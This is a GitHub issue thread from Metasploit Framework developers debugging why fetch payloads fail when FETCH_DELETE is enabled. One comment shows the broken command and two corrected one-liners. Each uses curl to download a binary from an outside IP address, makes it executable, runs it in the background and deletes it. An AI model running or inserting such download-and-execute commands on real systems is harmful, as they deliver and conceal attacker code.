### ISSUE TITLE
Reports of Fetch payloads failing when FETCH_DELETE is set to TRUE

### ISSUE THREAD

**Issue by bwatters-r7** [rapid7/metasploit-framework#19391]
@h00die-gr3y mentioned that there were reports of Fetch payloads failing when `FETCH_DELETE` was set to true.  I'm looking for examples to see if we can recreate and correct.

**Comment by h00die-gr3y** [comment]
Hi @bwatters-r7 ,
Just returned from holiday.
I will do some testing this weekend to get you some additional info on the issue.

**Comment by h00die-gr3y** [comment]
@bwatters-r7 ,
Just checked your command line that you  are using to remove the payload when `FETCH_DELETE` is set to `true`.
See example below:
```
curl -so /tmp/zMoATqjBXhsa http://192.168.201.8:1981/metoo.bin; chmod +x /tmp/zMoATqjBXhsa; /tmp/zMoATqjBXhsa &; rm -rf /tmp/zMoATqjBXhsa
/bin/sh: 76: Syntax error: ";" unexpected
```

Unfortunate the third command in your multi commandline  `/tmp/zMoATqjBXhsa &;` will throw a syntax error (in bash, sh and most other shells). There needs to be a command before `;`

The  correct way to do this is using `(...)` creating a subshell or using brackets `{ ... }`

**Example using `(...)`**
`curl -so /tmp/zMoATqjBXhsa http://192.168.201.8:1981/metoo.bin; chmod +x /tmp/zMoATqjBXhsa; (/tmp/zMoATqjBXhsa &); rm -rf /tmp/zMoATqjBXhsa`

**Example using `{ ... }`**
`curl -so /tmp/zMoATqjBXhsa http://192.168.201.8:1981/metoo.bin; chmod +x /tmp/zMoATqjBXhsa; { /tmp/zMoATqjBXhsa & }; rm -rf /tmp/zMoATqjBXhsa`

Note that the braces are more picky about syntax--the space after {, the space before } is required.  In some situations, the braces are more efficient because they don't fork a new subshell. 

Just try it out in a linux shell yourself.
